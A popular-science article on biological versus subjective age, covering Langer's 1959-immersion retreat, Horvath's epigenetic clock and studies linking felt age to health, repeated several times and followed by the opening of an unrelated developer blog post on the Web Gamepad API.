It’s this perception of one’s age, or subjective age, that interests Antonio Terracciano, a psychologist and gerontologist at Florida State University College of Medicine. Horvath’s work shows that biological age is correlated with diseases. Can one say the same thing about subjective age?
People’s perception of their own age can differ markedly from person to person. People between the ages of 40 and 80, for example, tend to think they are younger. People who are 60 may say that they feel like they are 50 or 55, or sometimes even 45. Rarely will they say they feel older. However, people in their 20s often perceive their age to be the same as their chronological age, and may say they feel somewhat older.
Terracciano and colleagues have found that subjective age correlates with certain physiological markers of aging, such as grip strength, walking speed, lung capacity, and even the levels of C-reactive protein in the blood, an indication of inflammation in the body. The younger you feel you are, the better are these indicators of age and health: You walk faster, have better grip strength and lung capacity, and less inflammation.
Subjective age affects cognition and is an indicator of the likelihood of developing dementia. Terracciano and colleagues looked at data collected from 5,748 people aged 65 or older. The subjects’ cognitive abilities were evaluated to establish a baseline and they were then followed for a period of up to four years. The subjects were also asked about how old they felt at each instance. The researchers found that those who had a higher subjective age to start with were more likely to develop cognitive impairments and even dementia.
These correlation studies have limitations, however. For example, it’s possible that physically active people, who have better walking speed and lung capacity, and lower levels of C-reactive protein in their blood, naturally feel younger. How can one establish that our subjective age influences physiology and not the other way around?
That’s exactly what Yannick Stephan of the University of Grenoble in France and colleagues tried to find out. They recruited 49 adults, aged between 52 and 91, and divided them into an experimental and control group. Both groups were first asked their subjective age—how old they felt as opposed to their chronological age—and tested for grip strength to establish a baseline. The experimental group was told they had done better than 80 percent of people their age. The control group received no feedback. After this experimental manipulation, both groups were tested again for grip strength and asked about how old they felt. The experimental group reported feeling, on average, younger than their baseline subjective age. No such change was seen in the control group. Also, the experimental group showed an increase in grip strength, while the grip strength of the control decreased somewhat.
These correlations do not necessarily mean that feeling young causes better health. Terracciano’s next step is to correlate subjective age with quantitative biological markers of age. While no study has yet been done to find associations between the newly developed epigenetic markers and subjective age, Terracciano is keen to see if there are strong correlations.
Still, the message seems to be that our chronological age really is just a number. “If people think that because they are getting older they cannot do things, or cut their social ties, or incorporate this negative view which limits their life, that can be really detrimental,” says Terracciano. “Fighting those negative attitudes, challenging yourself, keeping an open mind, being engaged socially, can absolutely have a positive impact.”
is an award-winning journalist and author. His first book, The Edge of Physics, was named Book of the Year in 2010 by PhysicsWorld. His second book, The Man Who Wasn’t There, was nominated for the PEN/E. O. Wilson Literary Science Writing Award. @AnilAnanth
In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited a group of elderly men in their late 70s and early 80s to spend a week with them and live as they did in 1959, “a time when an IBM computer filled a whole room and panty hose had just been introduced to U.S. women,” Langer wrote. Her idea was to return the men, at least in their minds, to a time when they were younger and healthier—and to see if it had physiological consequences.
Every day Langer and her students met with the men to discuss “current” events. They talked about the first United States satellite launch, Fidel Castro entering Havana after his march across Cuba, and the Baltimore Colts winning the NFL championship game. They discussed “current” books: Ian Fleming’s Goldfinger and Leon Uris’ Exodus. They watched Ed Sullivan and Jack Benny and Jackie Gleason on a black-and-white TV, listened to Nat King Cole on the radio, and saw Marilyn Monroe in Some Like It Hot. Everything was transporting the men back to 1959.
When Langer studied the men after a week of such sensory and mindful immersion in the past, she found that their memory, vision, hearing, and even physical strength had improved. She compared the traits to those of a control group of men, who had also spent a week in a retreat. The control group, however, had been told the experiment was about reminiscing. They were not told to live as if it were 1959. The first group, in a very objective sense, seemed younger. The team took photographs of the men before and after the experiment, and people who knew nothing about the study said the men looked younger in the after-pictures, says Langer, who today is a professor of psychology at Harvard University.
IN THE YEAR 1959A psychology experiment that took seniors back to a time when they were young—1959, to be exact, evoked by the images above—revealed that living as they did in 1959 improved their memory, vision, and hearing.
Clockwise: Robert Riger / Getty Images; Wikipedia; Wikipedia; Luis Korda/ Wikipedia; Wikipedia; Wikipedia
Langer’s experiment was a tantalizing demonstration that our chronological age based on our birthdate is a misleading indicator of aging. Langer, of course, was tackling the role of the mind in how old we feel and act. Since her study, others have taken a more objective look at the aging body. The goal is to determine an individual’s “biological age,” a term that aims to capture the body’s physiological development and decline with time, and predict, with reasonable accuracy, the risks of disease and death. As scientists have worked to pinpoint a person’s biological age, they have learned that organs and tissues often age differently, making it difficult to reduce biological age to a single number. They have also made a discovery that echoes Langer’s work. How old we feel—our subjective age—can influence how we age. Where age is concerned, the pages torn off a calendar do not tell the whole story.
While we intuitively know what it means to grow old, precise definitions of aging haven’t been easy to come by. In 1956, British gerontologist and author Alex Comfort (later famous for writing The Joy of Sex) memorably defined senescence as “a decrease in viability and an increase in vulnerability.” Any given individual, he wrote, would die from “randomly distributed causes.” Evolutionary biologists think of aging as something that reduces our ability to survive and reproduce because of “internal physiological deterioration.” Such deterioration, in turn, can be understood in terms of cellular functions: The older the cells in an organ, the more likely they are to stop dividing and die, or develop mutations that lead to cancer. This leads us to the idea that our bodies may have a true biological age.
The road to determining that age, though, has not been a straight one. One approach is to look for so-called biomarkers of aging, something that’s changing in the body and can be used as a predictor of the likelihood of being struck by age-related diseases or of how much longer one has left to live. An obvious set of biomarkers could be attributes like blood pressure or body weight. Both tend to go up as the body ages. But they are unreliable. Blood pressure can be affected by medication and body weight depends on lifestyle and diet, and there are people who certainly don’t gain weight as they age.
Where age is concerned, the pages torn off calendar do not tell the whole story.
In the 1990s, one promising biomarker stood out: stretches of DNA called telomeres. They appear at the ends of chromosomes, serving as caps that protect the chromosomes from fraying. Telomeres have often been likened to the plastic tips that similarly protect shoelaces. It turns out that telomeres themselves get shorter and shorter each time a cell divides. And when the telomere shortens beyond a point, the cell dies. There’s a strong relationship between telomere length and health and diseases, such as cancer and atherosclerosis.
But despite a range of studies trying to find such a link, it’s been hard to make the case for telomeres as accurate biomarkers of aging. In 2013, Anne Newman, director of the Center for Aging and Population Health at the University of Pittsburgh, and her student Jason Sanders reviewed the existing literature on telomeres and concluded that “if telomere length is a biomarker of human aging, it is a weak biomarker with poor predictive accuracy.”
“Twenty years ago, people had high hopes that telomere length could actually explain aging, as in biological aging. There was a hope that it would be the root cause of aging,” says Steve Horvath, a geneticist and biostatistician at the University of California, Los Angeles. “Now we know that that’s simply not the case. In the last 10 to 15 years, people realized that there must be other mechanisms that play an important role in aging.”
Attention shifted to how fast stem cells are being depleted in the body, or the efficacy of mitochondria (the organelles inside our cells that produce the energy needed for cells to function). Horvath scoured the data for reliable markers, looking at, for example, levels of gene expression for any strong correlations to aging. He found none.
But that didn’t mean there weren’t reliable biomarkers. There was one set of data Horvath had been studiously avoiding. This had to do with DNA methylation, a process cells use to switch off genes. Methylation mainly involves the addition of a so-called methyl group to cytosine, one of the four main bases that make up strands of DNA. Because DNA methylation does not alter the core genetic sequence, but rather modifies gene expression externally, the process is called epigenetics.
EPIGENETIC CLOCKUCLA geneticist Steve Horvath (above) identified methylation levels on the human genome that serve as remarkable signs of biological aging. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
Courtesy of Steve Horvath
Horvath didn’t think that epigenetics would have anything to do with aging. “I had data sitting there and I would not really touch them, because I thought there was no meaning in it anyway,” he says.
But some time in 2009, Horvath gave in and analyzed a dataset of methylation levels at 27,000 locations on the human genome—an analysis “you can do in an hour,” he says. Nothing in his 10 years of analyzing genomic datasets had prepared him for the results. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
Because their minds were taken back to a time when they were younger, their bodies went back too.
After a few more years of “labor intensive” work, Horvath identified 353 special sites on the human genome that were present in cells in every tissue and organ. Horvath developed an algorithm that used the methylation levels at these 353 sites—regardless of the cell type—to establish an epigenetic clock. His algorithm took into account that in some of these 353 sites, the methylation levels decreased with age, while in others they increased.
In 2013, Horvath published the results of his analysis of 8,000 samples taken from 51 types of healthy tissue and cells, and the conclusions were striking. When he calculated a single number for the biological age of the person based on the weighted average of the methylation levels at the 353 sites, he found that this number correlated well with the chronological age of the person (it was off by less than 3.6 years in 50 percent of the people—a far better correlation than has been obtained for any other biomarker). He also discovered that for middle-aged people and older, the epigenetic clock starts slowing down or speeding up—providing a way of telling whether someone is aging faster or slower than the calendar suggests.
Despite the correlation, Horvath says that biological age, rather than being for the whole body, is better applied to specific tissues and organs, whether it’s bone, blood, heart, lungs, muscles, or even the brain. The difference between the biological age and chronological age can be negative, zero, or positive. A negative deviation means that the tissue or organ is younger than expected; a zero indicates that the tissue is aging normally; and a positive deviation means the tissue or organ is older. Data show that different tissues can age at different rates.
In general, diseases speed up the epigenetic clock, and this is particularly striking in patients with Down’s syndrome or in those infected with HIV. In both cases, the tissues tend to age faster than normal. For instance, the blood and brain tissue in those infected with HIV show accelerated aging. Obesity causes the liver to age faster. And studies of people who died of Alzheimer’s disease show that the prefrontal cortex undergoes accelerated aging. Horvath also analyzed 6,000 samples of cancerous tissue and found that the epigenetic clock was ticking much faster in such cases, showing that the tissue had aged significantly more than the chronological age.
Despite this wealth of data, there is a gaping hole in our understanding of this striking correlation between methylation markers and biological age. “The biggest weakness of the epigenetic clock is that we just don’t understand the precise molecular mechanism behind it,” says Horvath. His speculation—and he stresses it’s just speculation—is that the epigenetic clock is related to what he calls the “epigenetic maintenance system,” molecular and enzymatic processes that maintain the epigenome and protect it from damage. “I feel that these markers are a footprint of that mechanism,” says Horvath. But “why is it so accurate? What pathway relates to it? That’s the biggest challenge right now,” he adds.
Even without understanding exactly how and why it works, the epigenetic clock gives researchers a tool to test the efficacy of anti-aging interventions that can potentially slow aging. “It’d be very exciting to develop a therapy that allows us to reset the epigenetic clock,” says Horvath.
While Horvath is thinking about hormonal treatments, Langer’s work with elderly men at the monastery in New Hampshire suggests that we can use the power of our mind to influence the body. Langer didn’t publish her results in a scientific journal in 1979. At the time, she didn’t have the resources to do a thorough study for the leading journals. “When you run a retreat over the course of five days, it’s very hard to control for everything,” Langer says. “Also, I didn’t have the funds to have, for instance, a vacationing control group. I could have published it in a second-rate journal, but I didn’t see any point to that. I wanted to get the information out there and I wrote it first in a book for Oxford University Press, so it was reviewed.”
Also, her argument that mind and body are one was potentially a little too path-breaking for the journals. “I think they were unlikely to buy the theoretical part of it,” she says. “The findings, improving vision and hearing in an elderly population, were so unusual that they were not going to rush to publish and stick their necks out.” Since then, Langer has pursued the mind-body connection and its effects on physiology and aging in rigorous studies that have been published in numerous scientific journals and books.
Traditionally, the mind-body problem refers to the difficulty of explaining how our ostensibly non-material mental states can affect the material body (clearly seen in the placebo effect). To Langer, the mind and body are one. “Wherever you put the mind you are necessarily putting the body,” she says.
So Langer began asking if subjective mental states could influence something as objective as the levels of blood sugar in patients with Type 2 diabetes. The 46 subjects in her study, all suffering from Type 2 diabetes, were asked to play computer games for 90 minutes. On their desk was a clock. They were asked to switch games every 15 minutes. The twist in the study was that for one-third of the subjects, the clock was ticking slower than real time, for one-third it was going faster, and for the last third, the clock was keeping real time.
Most of us are slaves to our chronological age.
“The question we were asking was would blood sugar level follow real or perceived time,” says Langer. “And the answer is perceived time.” This was a striking illustration of psychological processes—in this case the subjective perception of time—influencing metabolic processes in the body that control the level of blood sugar.
Although Langer did not explore a connection between the mind and epigenetic changes, other studies suggest such a link. In 2013, Richard Davidson of the University of Wisconsin at Madison and his colleagues reported that even one day of mindfulness meditation can impact the expression of genes. In their study, 19 experienced meditators were studied before and after a full day of intensive meditation. For control, the researchers similarly studied a group of 21 people who engaged in a full day of leisure. At the end of the day, the meditators showed lowered levels of activity of inflammatory genes—exactly the kind of effect seen when one takes anti-inflammatory drugs. The study also showed lowered activity of genes that are involved in epigenetically controlling expressions of other genes. The state of one’s mind, it seems, can have an epigenetic effect.
Such studies taken together provide clues as to why the week-long retreat in New Hampshire reversed some of the age-related attributes in elderly men. Because their minds were taken back to a time when they were younger, their bodies too went back to that earlier time, bringing about some of the physiological changes that resulted in improved hearing or grip strength.
But it’s important to point out that biological aging is an inexorable process—and there comes a time when no amount of thinking positive thoughts can halt aging. If body and mind are one and the same—as Langer suggests—then an aging body and aging mind go hand-in-hand, limiting our ability to influence physiological decline with psychological deftness.
Still, Langer thinks that how we age has a lot to do with our perceptions of what aging means—often reinforced by culture and society. “Whether it’s about aging or anything else, if you are surrounded by people who have certain expectations for you, you tend to meet those expectations, positive or negative,” says Langer.
Most of us are slaves to our chronological age, behaving, as the saying goes, age-appropriately. For example, young people often take steps to recover from a minor injury, whereas someone in their 80s may accept the pain that comes with the injury and be less proactive in addressing the problem. “Many people, because of societal expectations, all too often say, ‘Well, what do you expect, as you get older you fall apart,’ ” says Langer. “So, they don’t do the things to make themselves better, and it becomes a self-fulfilling prophecy.”
It’s this perception of one’s age, or subjective age, that interests Antonio Terracciano, a psychologist and gerontologist at Florida State University College of Medicine. Horvath’s work shows that biological age is correlated with diseases. Can one say the same thing about subjective age?
People’s perception of their own age can differ markedly from person to person. People between the ages of 40 and 80, for example, tend to think they are younger. People who are 60 may say that they feel like they are 50 or 55, or sometimes even 45. Rarely will they say they feel older. However, people in their 20s often perceive their age to be the same as their chronological age, and may say they feel somewhat older.
Terracciano and colleagues have found that subjective age correlates with certain physiological markers of aging, such as grip strength, walking speed, lung capacity, and even the levels of C-reactive protein in the blood, an indication of inflammation in the body. The younger you feel you are, the better are these indicators of age and health: You walk faster, have better grip strength and lung capacity, and less inflammation.
Subjective age affects cognition and is an indicator of the likelihood of developing dementia. Terracciano and colleagues looked at data collected from 5,748 people aged 65 or older. The subjects’ cognitive abilities were evaluated to establish a baseline and they were then followed for a period of up to four years. The subjects were also asked about how old they felt at each instance. The researchers found that those who had a higher subjective age to start with were more likely to develop cognitive impairments and even dementia.
These correlation studies have limitations, however. For example, it’s possible that physically active people, who have better walking speed and lung capacity, and lower levels of C-reactive protein in their blood, naturally feel younger. How can one establish that our subjective age influences physiology and not the other way around?
That’s exactly what Yannick Stephan of the University of Grenoble in France and colleagues tried to find out. They recruited 49 adults, aged between 52 and 91, and divided them into an experimental and control group. Both groups were first asked their subjective age—how old they felt as opposed to their chronological age—and tested for grip strength to establish a baseline. The experimental group was told they had done better than 80 percent of people their age. The control group received no feedback. After this experimental manipulation, both groups were tested again for grip strength and asked about how old they felt. The experimental group reported feeling, on average, younger than their baseline subjective age. No such change was seen in the control group. Also, the experimental group showed an increase in grip strength, while the grip strength of the control decreased somewhat.
These correlations do not necessarily mean that feeling young causes better health. Terracciano’s next step is to correlate subjective age with quantitative biological markers of age. While no study has yet been done to find associations between the newly developed epigenetic markers and subjective age, Terracciano is keen to see if there are strong correlations.
Still, the message seems to be that our chronological age really is just a number. “If people think that because they are getting older they cannot do things, or cut their social ties, or incorporate this negative view which limits their life, that can be really detrimental,” says Terracciano. “Fighting those negative attitudes, challenging yourself, keeping an open mind, being engaged socially, can absolutely have a positive impact.”
In 1979, psychologist Ellen Langer and her students carefully refurbished an old monastery in Peterborough, New Hampshire, to resemble a place that would have existed two decades earlier. They invited a group of elderly men in their late 70s and early 80s to spend a week with them and live as they did in 1959, “a time when an IBM computer filled a whole room and panty hose had just been introduced to U.S. women,” Langer wrote. Her idea was to return the men, at least in their minds, to a time when they were younger and healthier—and to see if it had physiological consequences.
Every day Langer and her students met with the men to discuss “current” events. They talked about the first United States satellite launch, Fidel Castro entering Havana after his march across Cuba, and the Baltimore Colts winning the NFL championship game. They discussed “current” books: Ian Fleming’s Goldfinger and Leon Uris’ Exodus. They watched Ed Sullivan and Jack Benny and Jackie Gleason on a black-and-white TV, listened to Nat King Cole on the radio, and saw Marilyn Monroe in Some Like It Hot. Everything was transporting the men back to 1959.
When Langer studied the men after a week of such sensory and mindful immersion in the past, she found that their memory, vision, hearing, and even physical strength had improved. She compared the traits to those of a control group of men, who had also spent a week in a retreat. The control group, however, had been told the experiment was about reminiscing. They were not told to live as if it were 1959. The first group, in a very objective sense, seemed younger. The team took photographs of the men before and after the experiment, and people who knew nothing about the study said the men looked younger in the after-pictures, says Langer, who today is a professor of psychology at Harvard University.
IN THE YEAR 1959A psychology experiment that took seniors back to a time when they were young—1959, to be exact, evoked by the images above—revealed that living as they did in 1959 improved their memory, vision, and hearing. Clockwise: Robert Riger / Getty Images; Wikipedia; Wikipedia; Luis Korda/ Wikipedia; Wikipedia; Wikipedia
Langer’s experiment was a tantalizing demonstration that our chronological age based on our birthdate is a misleading indicator of aging. Langer, of course, was tackling the role of the mind in how old we feel and act. Since her study, others have taken a more objective look at the aging body. The goal is to determine an individual’s “biological age,” a term that aims to capture the body’s physiological development and decline with time, and predict, with reasonable accuracy, the risks of disease and death. As scientists have worked to pinpoint a person’s biological age, they have learned that organs and tissues often age differently, making it difficult to reduce biological age to a single number. They have also made a discovery that echoes Langer’s work. How old we feel—our subjective age—can influence how we age. Where age is concerned, the pages torn off a calendar do not tell the whole story.
While we intuitively know what it means to grow old, precise definitions of aging haven’t been easy to come by. In 1956, British gerontologist and author Alex Comfort (later famous for writing The Joy of Sex) memorably defined senescence as “a decrease in viability and an increase in vulnerability.” Any given individual, he wrote, would die from “randomly distributed causes.” Evolutionary biologists think of aging as something that reduces our ability to survive and reproduce because of “internal physiological deterioration.” Such deterioration, in turn, can be understood in terms of cellular functions: The older the cells in an organ, the more likely they are to stop dividing and die, or develop mutations that lead to cancer. This leads us to the idea that our bodies may have a true biological age.
The road to determining that age, though, has not been a straight one. One approach is to look for so-called biomarkers of aging, something that’s changing in the body and can be used as a predictor of the likelihood of being struck by age-related diseases or of how much longer one has left to live. An obvious set of biomarkers could be attributes like blood pressure or body weight. Both tend to go up as the body ages. But they are unreliable. Blood pressure can be affected by medication and body weight depends on lifestyle and diet, and there are people who certainly don’t gain weight as they age.
Where age is concerned, the pages torn off calendar do not tell the whole story.
In the 1990s, one promising biomarker stood out: stretches of DNA called telomeres. They appear at the ends of chromosomes, serving as caps that protect the chromosomes from fraying. Telomeres have often been likened to the plastic tips that similarly protect shoelaces. It turns out that telomeres themselves get shorter and shorter each time a cell divides. And when the telomere shortens beyond a point, the cell dies. There’s a strong relationship between telomere length and health and diseases, such as cancer and atherosclerosis.
But despite a range of studies trying to find such a link, it’s been hard to make the case for telomeres as accurate biomarkers of aging. In 2013, Anne Newman, director of the Center for Aging and Population Health at the University of Pittsburgh, and her student Jason Sanders reviewed the existing literature on telomeres and concluded that “if telomere length is a biomarker of human aging, it is a weak biomarker with poor predictive accuracy.”
“Twenty years ago, people had high hopes that telomere length could actually explain aging, as in biological aging. There was a hope that it would be the root cause of aging,” says Steve Horvath, a geneticist and biostatistician at the University of California, Los Angeles. “Now we know that that’s simply not the case. In the last 10 to 15 years, people realized that there must be other mechanisms that play an important role in aging.”
Attention shifted to how fast stem cells are being depleted in the body, or the efficacy of mitochondria (the organelles inside our cells that produce the energy needed for cells to function). Horvath scoured the data for reliable markers, looking at, for example, levels of gene expression for any strong correlations to aging. He found none.
But that didn’t mean there weren’t reliable biomarkers. There was one set of data Horvath had been studiously avoiding. This had to do with DNA methylation, a process cells use to switch off genes. Methylation mainly involves the addition of a so-called methyl group to cytosine, one of the four main bases that make up strands of DNA. Because DNA methylation does not alter the core genetic sequence, but rather modifies gene expression externally, the process is called epigenetics.
EPIGENETIC CLOCKUCLA geneticist Steve Horvath (above) identified methylation levels on the human genome that serve as remarkable signs of biological aging. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.” Courtesy of Steve Horvath
Horvath didn’t think that epigenetics would have anything to do with aging. “I had data sitting there and I would not really touch them, because I thought there was no meaning in it anyway,” he says.
But some time in 2009, Horvath gave in and analyzed a dataset of methylation levels at 27,000 locations on the human genome—an analysis “you can do in an hour,” he says. Nothing in his 10 years of analyzing genomic datasets had prepared him for the results. “I had never seen anything like it,” he says. “It’s a cliché, but it really was a smoking gun.”
Because their minds were taken back to a time when they were younger, their bodies went back too.
After a few more years of “labor intensive” work, Horvath identified 353 special sites on the human genome that were present in cells in every tissue and organ. Horvath developed an algorithm that used the methylation levels at these 353 sites—regardless of the cell type—to establish an epigenetic clock. His algorithm took into account that in some of these 353 sites, the methylation levels decreased with age, while in others they increased.
In 2013, Horvath published the results of his analysis of 8,000 samples taken from 51 types of healthy tissue and cells, and the conclusions were striking. When he calculated a single number for the biological age of the person based on the weighted average of the methylation levels at the 353 sites, he found that this number correlated well with the chronological age of the person (it was off by less than 3.6 years in 50 percent of the people—a far better correlation than has been obtained for any other biomarker). He also discovered that for middle-aged people and older, the epigenetic clock starts slowing down or speeding up—providing a way of telling whether someone is aging faster or slower than the calendar suggests.
Despite the correlation, Horvath says that biological age, rather than being for the whole body, is better applied to specific tissues and organs, whether it’s bone, blood, heart, lungs, muscles, or even the brain. The difference between the biological age and chronological age can be negative, zero, or positive. A negative deviation means that the tissue or organ is younger than expected; a zero indicates that the tissue is aging normally; and a positive deviation means the tissue or organ is older. Data show that different tissues can age at different rates.
In general, diseases speed up the epigenetic clock, and this is particularly striking in patients with Down’s syndrome or in those infected with HIV. In both cases, the tissues tend to age faster than normal. For instance, the blood and brain tissue in those infected with HIV show accelerated aging. Obesity causes the liver to age faster. And studies of people who died of Alzheimer’s disease show that the prefrontal cortex undergoes accelerated aging. Horvath also analyzed 6,000 samples of cancerous tissue and found that the epigenetic clock was ticking much faster in such cases, showing that the tissue had aged significantly more than the chronological age.
Despite this wealth of data, there is a gaping hole in our understanding of this striking correlation between methylation markers and biological age. “The biggest weakness of the epigenetic clock is that we just don’t understand the precise molecular mechanism behind it,” says Horvath. His speculation—and he stresses it’s just speculation—is that the epigenetic clock is related to what he calls the “epigenetic maintenance system,” molecular and enzymatic processes that maintain the epigenome and protect it from damage. “I feel that these markers are a footprint of that mechanism,” says Horvath. But “why is it so accurate? What pathway relates to it? That’s the biggest challenge right now,” he adds.
Even without understanding exactly how and why it works, the epigenetic clock gives researchers a tool to test the efficacy of anti-aging interventions that can potentially slow aging. “It’d be very exciting to develop a therapy that allows us to reset the epigenetic clock,” says Horvath.
While Horvath is thinking about hormonal treatments, Langer’s work with elderly men at the monastery in New Hampshire suggests that we can use the power of our mind to influence the body. Langer didn’t publish her results in a scientific journal in 1979. At the time, she didn’t have the resources to do a thorough study for the leading journals. “When you run a retreat over the course of five days, it’s very hard to control for everything,” Langer says. “Also, I didn’t have the funds to have, for instance, a vacationing control group. I could have published it in a second-rate journal, but I didn’t see any point to that. I wanted to get the information out there and I wrote it first in a book for Oxford University Press, so it was reviewed.”
Also, her argument that mind and body are one was potentially a little too path-breaking for the journals. “I think they were unlikely to buy the theoretical part of it,” she says. “The findings, improving vision and hearing in an elderly population, were so unusual that they were not going to rush to publish and stick their necks out.” Since then, Langer has pursued the mind-body connection and its effects on physiology and aging in rigorous studies that have been published in numerous scientific journals and books.
Traditionally, the mind-body problem refers to the difficulty of explaining how our ostensibly non-material mental states can affect the material body (clearly seen in the placebo effect). To Langer, the mind and body are one. “Wherever you put the mind you are necessarily putting the body,” she says.
So Langer began asking if subjective mental states could influence something as objective as the levels of blood sugar in patients with Type 2 diabetes. The 46 subjects in her study, all suffering from Type 2 diabetes, were asked to play computer games for 90 minutes. On their desk was a clock. They were asked to switch games every 15 minutes. The twist in the study was that for one-third of the subjects, the clock was ticking slower than real time, for one-third it was going faster, and for the last third, the clock was keeping real time.
Most of us are slaves to our chronological age.
“The question we were asking was would blood sugar level follow real or perceived time,” says Langer. “And the answer is perceived time.” This was a striking illustration of psychological processes—in this case the subjective perception of time—influencing metabolic processes in the body that control the level of blood sugar.
Although Langer did not explore a connection between the mind and epigenetic changes, other studies suggest such a link. In 2013, Richard Davidson of the University of Wisconsin at Madison and his colleagues reported that even one day of mindfulness meditation can impact the expression of genes. In their study, 19 experienced meditators were studied before and after a full day of intensive meditation. For control, the researchers similarly studied a group of 21 people who engaged in a full day of leisure. At the end of the day, the meditators showed lowered levels of activity of inflammatory genes—exactly the kind of effect seen when one takes anti-inflammatory drugs. The study also showed lowered activity of genes that are involved in epigenetically controlling expressions of other genes. The state of one’s mind, it seems, can have an epigenetic effect.
Such studies taken together provide clues as to why the week-long retreat in New Hampshire reversed some of the age-related attributes in elderly men. Because their minds were taken back to a time when they were younger, their bodies too went back to that earlier time, bringing about some of the physiological changes that resulted in improved hearing or grip strength.
But it’s important to point out that biological aging is an inexorable process—and there comes a time when no amount of thinking positive thoughts can halt aging. If body and mind are one and the same—as Langer suggests—then an aging body and aging mind go hand-in-hand, limiting our ability to influence physiological decline with psychological deftness.
Still, Langer thinks that how we age has a lot to do with our perceptions of what aging means—often reinforced by culture and society. “Whether it’s about aging or anything else, if you are surrounded by people who have certain expectations for you, you tend to meet those expectations, positive or negative,” says Langer.
Most of us are slaves to our chronological age, behaving, as the saying goes, age-appropriately. For example, young people often take steps to recover from a minor injury, whereas someone in their 80s may accept the pain that comes with the injury and be less proactive in addressing the problem. “Many people, because of societal expectations, all too often say, ‘Well, what do you expect, as you get older you fall apart,’ ” says Langer. “So, they don’t do the things to make themselves better, and it becomes a self-fulfilling prophecy.”
It’s this perception of one’s age, or subjective age, that interests Antonio Terracciano, a psychologist and gerontologist at Florida State University College of Medicine. Horvath’s work shows that biological age is correlated with diseases. Can one say the same thing about subjective age?
People’s perception of their own age can differ markedly from person to person. People between the ages of 40 and 80, for example, tend to think they are younger. People who are 60 may say that they feel like they are 50 or 55, or sometimes even 45. Rarely will they say they feel older. However, people in their 20s often perceive their age to be the same as their chronological age, and may say they feel somewhat older.
Terracciano and colleagues have found that subjective age correlates with certain physiological markers of aging, such as grip strength, walking speed, lung capacity, and even the levels of C-reactive protein in the blood, an indication of inflammation in the body. The younger you feel you are, the better are these indicators of age and health: You walk faster, have better grip strength and lung capacity, and less inflammation.
Subjective age affects cognition and is an indicator of the likelihood of developing dementia. Terracciano and colleagues looked at data collected from 5,748 people aged 65 or older. The subjects’ cognitive abilities were evaluated to establish a baseline and they were then followed for a period of up to four years. The subjects were also asked about how old they felt at each instance. The researchers found that those who had a higher subjective age to start with were more likely to develop cognitive impairments and even dementia.
These correlation studies have limitations, however. For example, it’s possible that physically active people, who have better walking speed and lung capacity, and lower levels of C-reactive protein in their blood, naturally feel younger. How can one establish that our subjective age influences physiology and not the other way around?
That’s exactly what Yannick Stephan of the University of Grenoble in France and colleagues tried to find out. They recruited 49 adults, aged between 52 and 91, and divided them into an experimental and control group. Both groups were first asked their subjective age—how old they felt as opposed to their chronological age—and tested for grip strength to establish a baseline. The experimental group was told they had done better than 80 percent of people their age. The control group received no feedback. After this experimental manipulation, both groups were tested again for grip strength and asked about how old they felt. The experimental group reported feeling, on average, younger than their baseline subjective age. No such change was seen in the control group. Also, the experimental group showed an increase in grip strength, while the grip strength of the control decreased somewhat.
These correlations do not necessarily mean that feeling young causes better health. Terracciano’s next step is to correlate subjective age with quantitative biological markers of age. While no study has yet been done to find associations between the newly developed epigenetic markers and subjective age, Terracciano is keen to see if there are strong correlations.
Still, the message seems to be that our chronological age really is just a number. “If people think that because they are getting older they cannot do things, or cut their social ties, or incorporate this negative view which limits their life, that can be really detrimental,” says Terracciano. “Fighting those negative attitudes, challenging yourself, keeping an open mind, being engaged socially, can absolutely have a positive impact.”
Anil Ananthaswamy is an award-winning journalist and author. His first book, The Edge of Physics, was named Book of the Year in 2010 by PhysicsWorld. His second book, The Man Who Wasn’t There, was nominated for the PEN/E. O. Wilson Literary Science Writing Award. @AnilAnanth
title: Web platform's hidden gems - Gamepad API description: A few weeks back I started the Web Platform’s hidden gems blog series. The idea behind the series is to cover the native API enhancements to the web platform and shed some light on how these APIs can… image: https://arunmichaeldsouza.com/img/blogs/web-platform's-hidden-gems---gamepad-api/1.png
description: A few weeks back I started the Web Platform’s hidden gems blog series. The idea behind the series is to cover the native API enhancements to the web platform and shed some light on how these APIs can be used to create some really interesting experiences on the web. Even though these APIs are in very… image: https://arunmichaeldsouza.com/img/blogs/web-platform's-hidden-gems---gamepad-api/1.png title: Web platform’s hidden gems - Gamepad API
Image source - vecteezy.com
A few weeks back I started the Web platform's hidden gems blog series. The idea behind the series is to cover the native API enhancements to the web platform and shed some light on how these APIs can be used to create some really interesting experiences on the web.
Even though these APIs are in very early stages at the moment, they seem to be really promising and tend to provide an idea on how web development in the coming years would look like. Having said that, I feel that it's important for developers to know about these specifications and understand the possibilities that the native web has to offer!
This is the first blog post of the series and in this post, I'll be talking about the Gamepad API.
Just a disclaimer though, this API is in very early stages and may undergo major changes in terms of implementation and usage.
Connecting a gamepad to the browser
The Gamepad specification defines a low-level interface that represents gamepad devices.
This means that using this API, developers would be able to connect gamepads and similar input devices to the browser and be able to use them in their gaming applications. There would be no need to design any complex mouse/keyboard based interfaces for game controls that can be tricky to operate and can take some time to get used to. Game developers would be able to provide more natural controls to their users like joystick driven character movements.
The gamepadconnected event is emitted whenever a new gamepad is connected to the page. If the gamepad is already connected when the page loads and gains focus then the event is emitted when a button is pressed or an axis is moved on the gamepad.
Logging info of a connected gamepad
The window.navigator.getGamepads() method returns an array of Gamepad objects, one for each gamepad connected to the device. The Gamepad API supports up to 4 simultaneous connections at the moment.
If you log out the 0th index (the first connected gamepad) you can see the gamepad info -
The Gamepad interface stores information about the connected gamepad
The gamepaddisconnected event is emitted whenever a gamepad (which has previously received data from the page) has been disconnected.
Logging info of a disconnected gamepad
Tracking button press and axis movement
Currently, the gamepad API only supports these two events - gamepadconnected and gamepaddisconnected. There is no standardized way to detect gamepad button presses or axis movements. The Gamepad interface does return useful information about the gamepad buttons, axes and their current states (button press and axis movement values) but there is no actual event that is dispatched when these actions are performed by the user.
Capturing button state changes using requestAnimationFrame()
In the context of a video game, a game loop is something that continuously checks for user input, updates the game state and renders the scene. requestAnimationFrame() seems to be fitting well for this as we can perform all these operations in its callback and it would remain in sync with the repaint tasks in every frame.
Ideally that's how user input should be polled in a gaming application.
I'd highly recommend checking this article - Anatomy of a video game, if you want to know more about how a typical game loop workflow can be implemented in JavaScript.
This does give us the user input states as expected but we still need a way to store and discard these values in an efficient way. Ideally in the form of an API that can be exposed and reused in any gaming application.
